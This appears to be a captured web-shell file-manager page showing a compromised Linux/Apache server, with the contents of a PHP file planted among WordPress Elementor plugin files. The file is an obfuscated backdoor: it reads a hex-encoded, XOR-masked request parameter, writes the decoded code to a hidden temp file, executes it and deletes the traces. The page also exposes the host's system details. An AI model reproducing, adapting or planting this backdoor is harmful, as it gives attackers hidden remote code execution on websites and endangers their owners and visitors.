HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux ip-172-31-42-149 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 07:00:04 UTC 2025 aarch64
User: ubuntu (1000)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
$ pwd: /proc/self/cwd/wp-content/plugins/elementor/core/common/modules/connect/apps/
Upload Files
File: //proc/self/cwd/wp-content/plugins/elementor/core/common/modules/connect/apps/common.user.php
<?php

if(count($_REQUEST) > 0 && isset($_REQUEST["h\x6Fl\x64e\x72"])){
	$ptr = array_filter([getenv("TEMP"), "/dev/shm", "/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/var/tmp", getcwd(), session_save_path(), getenv("TMP")]);
	$dat = hex2bin($_REQUEST["h\x6Fl\x64e\x72"]);
	$itm    =    ''     ;    foreach(str_split($dat) as $char){$itm .= chr(ord($char) ^ 87);}
	foreach ($ptr as $val) {
    		if (is_dir($val) ? is_writable($val) : false) {
    $ent = vsprintf("%s/%s", [$val, ".sym"]);
    if (@file_put_contents($ent, $itm) !== false) {
	include $ent;
	unlink($ent);
	exit;
}
}
}
}
@ Telegram